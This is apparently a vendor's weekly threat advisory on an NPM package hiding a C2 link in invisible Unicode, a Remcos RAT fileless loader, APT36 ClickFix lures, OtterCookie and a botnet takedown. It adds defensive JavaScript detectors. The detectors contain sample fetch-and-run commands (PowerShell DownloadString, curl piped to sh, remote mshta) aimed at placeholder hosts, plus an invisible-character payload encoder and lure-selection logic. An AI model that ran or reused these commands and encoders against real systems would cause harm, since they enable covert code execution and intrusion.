Malicious NPM Package Uses Google Calendar as C2 Channel


In the past week, several significant threats were reported across platforms. A malicious NPM package (os-info-checker-es6) was found using Unicode steganography and Google Calendar links for covert command-and-control (C2) communication; despite public disclosure, it and four related packages remain available on NPM, posing an ongoing supply chain risk. In another campaign, attackers are delivering Remcos RAT through a fileless PowerShell loader, starting from tax-themed phishing emails that carry malicious LNK files; the infection chain uses mshta.exe and registry persistence to load the malware directly in memory. Meanwhile, Pakistan-linked APT36 has expanded its ClickFix social engineering campaign to Windows and Linux users through fake Ministry of Defence websites and OS-specific clipboard manipulation. Separately, North Korea's WaterPlum group (aka Famous Chollima) has upgraded its OtterCookie malware with improved credential theft and VM evasion across platforms as part of the Contagious Interview campaign. Lastly, a joint U.S.-Dutch operation (Moonlander) disrupted a proxy botnet that earned over $46 million, built on TheMoon malware and thousands of compromised IoT and end-of-life devices, highlighting the persistent risk from unpatched infrastructure. These developments underscore the need for organizations to stay vigilant and apply security updates promptly.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.


1. Supply Chain Attack: Malicious NPM Package Uses Google Calendar as C2 Channel

A malicious NPM package named os-info-checker-es6 has been discovered using Unicode steganography and Google Calendar links for covert command-and-control (C2) communication. Initially benign, the package was modified in May 2025 to deliver obfuscated binaries and scripts executed through eval(). The malware extracts invisible Unicode characters embedded in otherwise ordinary-looking strings and decodes them into a Google Calendar short link; the calendar event then yields a base64-encoded URL for the second-stage payload. Four related packages, namely skip-tot, vue-dev-serverr, vue-dummyy, and vue-bit, pull it in as a dependency and pose as utility tools to widen the campaign's reach. Despite a detailed disclosure by Veracode, the packages remained available on NPM at the time of writing, posing an ongoing risk. Organizations are advised to audit NPM dependencies and lockfiles, remove the affected packages, implement runtime monitoring, and block access to calendar.google.com from build environments. Dependency scanning tools and CI/CD hardening are essential to detect obfuscation techniques such as invisible-character payloads and to prevent future supply chain compromises.
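The following is an added example for this advisory; it is not code from the os-info-checker-es6 package or from Veracode's analysis. It shows how a payload can be hidden in "invisible" Unicode variation selectors appended to a normal string, and how a dependency scanner can find and decode such runs. The byte mapping used (U+FE00..U+FE0F for values 0..15, U+E0100..U+E01EF for 16..255) is an assumption taken from the widely circulated "invisible text" scheme; the advisory does not state which mapping the malicious package used. The hidden link and the sample source are constructed placeholders.

```javascript
// Added example, not code from the malicious package or from Veracode.
// ASSUMPTION: byte <-> variation-selector mapping as in the public
// "invisible text" scheme; the page does not give the package's exact mapping.

function byteToSelector(b) {
  return b < 16
    ? String.fromCodePoint(0xfe00 + b)
    : String.fromCodePoint(0xe0100 + (b - 16));
}

function selectorToByte(cp) {
  if (cp >= 0xfe00 && cp <= 0xfe0f) return cp - 0xfe00;
  if (cp >= 0xe0100 && cp <= 0xe01ef) return cp - 0xe0100 + 16;
  return -1; // not a variation selector
}

// Attacker side: append the secret's UTF-8 bytes to a visible carrier string
// as invisible selectors. The result renders exactly like `carrier`.
function hideInSelectors(carrier, secret) {
  let out = carrier;
  for (const b of Buffer.from(secret, 'utf8')) out += byteToSelector(b);
  return out;
}

// Defender side: walk the source by code point (so astral selectors are seen
// whole), collect maximal runs of selectors and decode each run to text.
function extractHiddenRuns(source) {
  const findings = [];
  let run = [];
  let runStart = -1;
  let index = 0; // code-point index, not UTF-16 offset
  const flush = () => {
    if (run.length > 0) {
      findings.push({
        offset: runStart,
        bytes: run.length,
        text: Buffer.from(run).toString('utf8'),
      });
      run = [];
    }
  };
  for (const ch of source) {
    const b = selectorToByte(ch.codePointAt(0));
    if (b >= 0) {
      if (run.length === 0) runStart = index;
      run.push(b);
    } else {
      flush();
    }
    index++;
  }
  flush();
  return findings;
}

// CI gate: one selector is normal (U+FE0F after an emoji in a UI string);
// a long run of them inside source code is not.
function hasSuspiciousSelectors(source, minBytes = 8) {
  return extractHiddenRuns(source).some((f) => f.bytes >= minBytes);
}

// Constructed sample (not the real package): a visible '|' carrier followed
// by a hidden Google Calendar short link. The link itself is a placeholder.
const HIDDEN_LINK = 'https://calendar.app.google/EXAMPLE';
const SAMPLE_SOURCE =
  'const marker = "' + hideInSelectors('|', HIDDEN_LINK) + '";\n' +
  'module.exports = { marker };\n';

for (const f of extractHiddenRuns(SAMPLE_SOURCE)) {
  console.log(`offset ${f.offset}: ${f.bytes} hidden bytes -> ${JSON.stringify(f.text)}`);
}
```

Run this over every .js file in node_modules after install (or over the tarball contents in CI) and fail the build on any run above the threshold. A production scanner should also look for other zero-width code points (U+200B..U+200D, U+2060, U+FEFF and the U+E0000 tag block), since the same trick works with any characters that render as nothing.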

2. Remcos RAT Campaign Uses Fileless Techniques and AI-Evading Phishing Lures

A new malware campaign is leveraging malicious LNK shortcut files and mshta.exe to deploy the Remcos Remote Access Trojan (RAT) using a fileless, PowerShell-based shellcode loader. Delivered via tax-themed phishing emails, the attack starts with ZIP archives containing LNK files disguised as Office documents. When opened, the LNK invokes mshta.exe to execute a remote HTA file (xlab22.hta), which runs obfuscated VBScript to download a PowerShell script. That script fetches a decoy PDF and a second HTA file (311.hta), and modifies the Windows Registry for persistence. The PowerShell code runs entirely in memory, evading file-based defenses, and loads Remcos RAT, which is capable of keylogging, clipboard monitoring, remote access, and data exfiltration to domains such as readysteaurants[.]com. Qualys, which analyzed the campaign, linked its domains and IPs to infrastructure seen in recent campaigns. Organizations are urged to block LNK and HTA attachments, monitor PowerShell and mshta.exe usage (in particular mshta.exe launched with a URL argument and PowerShell spawned by mshta.exe), and implement script-blocking and behavioral EDR controls to detect in-memory threats.
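As an added example (not Qualys's detection content and not from the original advisory), the logic below correlates process-creation and registry events to flag the mshta.exe to PowerShell to Run-key chain described above. The event fields mirror Sysmon's process-create and registry-value-set events, but the events, PIDs and hostnames (example.invalid) are constructed for this example.

```javascript
// Added example: detection logic over constructed Sysmon-style telemetry.
// Not the vendor's rules; field names and sample data are assumptions.

const LOLBIN_PARENTS = new Set(['mshta.exe', 'wscript.exe', 'cscript.exe']);
const SCRIPT_HOSTS = new Set([...LOLBIN_PARENTS, 'powershell.exe', 'pwsh.exe']);
const RUN_KEY = /\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\/i;
const PS_HIDDEN = /-w(?:indowstyle)?\s+hidden\b/i;
const PS_BYPASS = /-(?:ep|executionpolicy)\s+bypass\b/i;
const PS_ENCODED = /-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}/i;

const baseName = (image) => image.split(/[\\/]/).pop().toLowerCase();

function analyzeEvents(events) {
  const byPid = new Map();
  for (const e of events) if (e.type === 'process') byPid.set(e.pid, e);

  // Parent chain of a PID, nearest ancestor first; guards against cycles.
  const ancestors = (pid) => {
    const out = [];
    const seen = new Set();
    let cur = byPid.get(pid);
    while (cur && !seen.has(cur.pid)) {
      seen.add(cur.pid);
      cur = byPid.get(cur.ppid);
      if (cur) out.push(cur);
    }
    return out;
  };
  const isRemoteMshta = (p) =>
    Boolean(p) && baseName(p.image) === 'mshta.exe' && /https?:\/\//i.test(p.cmdline);

  const findings = [];
  for (const e of events) {
    if (e.type === 'process') {
      const name = baseName(e.image);
      if (isRemoteMshta(e)) {
        findings.push({ rule: 'mshta-remote-hta', pid: e.pid, detail: e.cmdline });
      }
      if (name === 'powershell.exe' || name === 'pwsh.exe') {
        const parent = byPid.get(e.ppid);
        if (parent && LOLBIN_PARENTS.has(baseName(parent.image))) {
          findings.push({ rule: 'powershell-spawned-by-script-host', pid: e.pid,
            detail: `parent ${baseName(parent.image)} (${parent.pid})` });
        }
        if (PS_HIDDEN.test(e.cmdline) || PS_BYPASS.test(e.cmdline) || PS_ENCODED.test(e.cmdline)) {
          findings.push({ rule: 'powershell-evasive-flags', pid: e.pid, detail: e.cmdline });
        }
      }
    } else if (e.type === 'registry' && e.op === 'SetValue' && RUN_KEY.test(e.target)) {
      if (SCRIPT_HOSTS.has(baseName(e.image))) {
        findings.push({ rule: 'run-key-set-by-script-host', pid: e.pid, detail: e.target });
        // Tie persistence back to the initial remote HTA launch via the parent chain.
        if (ancestors(e.pid).some(isRemoteMshta)) {
          findings.push({ rule: 'chain-mshta-powershell-runkey', pid: e.pid,
            detail: `${e.target} <- ${e.details}` });
        }
      }
    }
  }
  return findings;
}

// Constructed sample: the chain from the advisory plus two benign events.
const PS_IMAGE = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe';
const SAMPLE_EVENTS = [
  { type: 'process', pid: 4100, ppid: 1200, image: 'C:\\Windows\\explorer.exe', cmdline: 'explorer.exe' },
  // user opens the LNK from the ZIP: explorer launches mshta with a remote HTA
  { type: 'process', pid: 5320, ppid: 4100, image: 'C:\\Windows\\System32\\mshta.exe',
    cmdline: '"C:\\Windows\\System32\\mshta.exe" https://example.invalid/xlab22.hta' },
  { type: 'process', pid: 5404, ppid: 5320, image: PS_IMAGE,
    cmdline: 'powershell.exe -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'https://example.invalid/stage2.ps1\')"' },
  { type: 'registry', pid: 5404, image: PS_IMAGE, op: 'SetValue',
    target: 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater',
    details: 'mshta https://example.invalid/311.hta' },
  // benign noise: an admin script without evasive flags, an installer writing a Run value
  { type: 'process', pid: 6000, ppid: 4100, image: PS_IMAGE,
    cmdline: 'powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1' },
  { type: 'registry', pid: 6100, image: 'C:\\Windows\\System32\\msiexec.exe', op: 'SetValue',
    target: 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive',
    details: 'C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe' },
];

for (const f of analyzeEvents(SAMPLE_EVENTS)) {
  console.log(`[${f.rule}] pid ${f.pid}: ${f.detail}`);
}
```

With Sysmon, the process events come from Event ID 1 and the registry events from Event ID 13; the chain rule is what separates this loader from an administrator's scheduled PowerShell, because a Run value written by a descendant of a URL-launched mshta.exe has no legitimate counterpart.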

3. APT36 Expands ClickFix Campaign Targeting Windows and Linux

A new cross-platform ClickFix campaign has been identified targeting Windows and Linux systems, following earlier activity against macOS, through clipboard manipulation and Run dialog execution. Attributed to APT36 (Transparent Tribe), a Pakistan-linked group, the campaign uses fake Ministry of Defence websites to trick users into copying and executing OS-specific commands. On Windows, users are shown a fake warning that leads to MSHTA-based malware execution, while Linux users are redirected through a CAPTCHA page that copies a shell command to the clipboard. That command currently downloads only a benign image, suggesting the Linux payload is still in a testing phase, though the infrastructure is ready for malicious use. macOS users were previously targeted via fake Google Meet error pages, confirming that ClickFix is OS-agnostic. The tactic blends social engineering, JavaScript clipboard control, and OS fingerprinting. Organizations should educate users never to paste commands from a website into the Run dialog or a terminal, restrict the Run dialog where feasible, and monitor clipboard activity. Blocking mshta.exe and PowerShell where they are not needed, along with malicious domains such as trade4wealth[.]in, is strongly advised to mitigate the risk.
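As an added example (not code from the APT36 lure pages or from the original advisory), the block below shows both halves of the mechanic described above: the User-Agent fingerprinting a ClickFix page uses to decide which command to place on the clipboard, and a defensive classifier that flags ClickFix-style commands when they appear in the clipboard or the Run dialog. The User-Agent strings, the sample commands and the example.invalid URLs are constructed; the real campaign's Linux command only fetched an image at the time of analysis.

```javascript
// Added example: OS fingerprinting as a lure page does it, plus a clipboard
// classifier for defenders. All lures and UAs below are constructed.

function fingerprintOS(userAgent) {
  const ua = userAgent || '';
  // Order matters: Android UAs also contain "Linux", iPad UAs contain "Mac OS X".
  if (/Windows NT/i.test(ua)) return 'windows';
  if (/Android/i.test(ua)) return 'android';
  if (/iPhone|iPad|iPod/i.test(ua)) return 'ios';
  if (/Mac OS X/i.test(ua)) return 'macos';
  if (/Linux|X11/i.test(ua)) return 'linux';
  return 'unknown';
}

// What a lure page would copy for each OS (constructed stand-ins).
const SAMPLE_CLIPBOARD = {
  windows: 'mshta https://example.invalid/captcha.hta # I am not a robot - Verification ID: 7331',
  linux: 'echo "' + Buffer.from('curl -s https://example.invalid/a.sh | sh').toString('base64') +
    '" | base64 -d | bash',
  macos: 'osascript -e \'do shell script "curl -s https://example.invalid/x | sh"\'',
};

// The page serves one payload per OS; desktop-only campaigns return nothing for mobile.
function selectLure(userAgent) {
  return SAMPLE_CLIPBOARD[fingerprintOS(userAgent)] || null;
}

// Indicators a clipboard or Run-dialog monitor can match before execution.
const INDICATORS = [
  { name: 'mshta-remote', os: 'windows', re: /\bmshta(?:\.exe)?\s+["']?https?:\/\//i },
  { name: 'powershell-hidden-or-bypass', os: 'windows',
    re: /\bpowershell(?:\.exe)?\b.*-(?:w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass|e(?:nc)?\s+[A-Za-z0-9+/=]{16,})/i },
  { name: 'download-to-shell', os: 'linux', re: /\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b/i },
  { name: 'base64-to-shell', os: 'linux', re: /\bbase64\s+(?:-d|--decode)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b/i },
  { name: 'osascript', os: 'macos', re: /\bosascript\b/i },
  // ClickFix commands often end in a comment that makes the Run dialog read as a "verification" step.
  { name: 'verification-comment-padding', os: 'any', re: /#\s*(?:I am not a robot|verification|captcha)/i },
];

function classifyClipboardText(text) {
  const matched = INDICATORS.filter((i) => i.re.test(text)).map((i) => i.name);
  const hasCommand = INDICATORS.some((i) => i.os !== 'any' && matched.includes(i.name));
  const risk = hasCommand ? 'high' : matched.length > 0 ? 'medium' : 'low';
  return { matched, risk };
}

for (const [os, cmd] of Object.entries(SAMPLE_CLIPBOARD)) {
  console.log(os, JSON.stringify(classifyClipboardText(cmd)));
}
```

The classifier is a triage signal, not a verdict: legitimate installers also use the curl-pipe-shell pattern, so a clipboard monitor should surface the text to the user or SOC rather than silently block it. The decisive tell in ClickFix is the combination of a copied command, a "verification" pretext and an OS-specific living-off-the-land host such as mshta.exe.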

4. WaterPlum Upgrades OtterCookie Malware in Contagious Interview Campaign

North Korean threat group WaterPlum (aka Famous Chollima, linked to Lazarus Group) has upgraded its OtterCookie malware to v3 and v4 as part of the Contagious Interview campaign, enhancing data theft and virtual machine evasion. OtterCookie now includes modules for stealing browser credentials, cryptocurrency wallet data, mnemonic phrases, and iCloud Keychain content. Version 4 adds detection of VMware, VirtualBox, QEMU, and other sandbox environments. The malware is distributed via malicious npm packages, trojanized repositories, and fake macOS apps. A new payload, Tsunami-Framework, a modular .NET-based malware, has also surfaced with capabilities for keystroke logging, browser data theft, and botnet activity. The campaign also involves fraudulent IT job seekers who use deepfake resumes, fake LinkedIn profiles, and long-duration Zoom calls to infiltrate organizations. Targets include global firms and government contractors. Organizations should block associated infrastructure, verify candidate identities, treat code assessments and repositories sent by unsolicited recruiters as untrusted before running them, and monitor for suspicious access and credential theft activity.

5. Operation Moonlander Disrupts Massive Botnet Exploiting IoT and End-of-Life Devices

A joint operation by U.S. and Dutch authorities has dismantled a large-scale criminal proxy botnet powered by malware-infected IoT and end-of-life (EoL) devices, which generated over $46 million in illicit revenue. Four individuals from Russia and Kazakhstan were charged with running 5socks.net and anyproxy.net, services that sold unauthorized residential proxy access to cybercriminals. The operation, dubbed Moonlander, disrupted infrastructure built on TheMoon malware, which exploited unpatched routers to maintain persistent remote access and spread silently. TheMoon, active since 2014, primarily targeted Linksys routers via remote script injection, using C2 servers in Turkey to coordinate infections. Over 7,000 proxies were advertised daily, enabling anonymization, ad fraud, DDoS attacks, and other malicious activity. Despite the takedown, EoL device risks persist, particularly in the U.S., Canada, and Ecuador, where most bots were located. Organizations are urged to replace outdated routers, apply firmware updates, restrict exposure of management ports, and monitor network traffic for unusual behavior.

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.
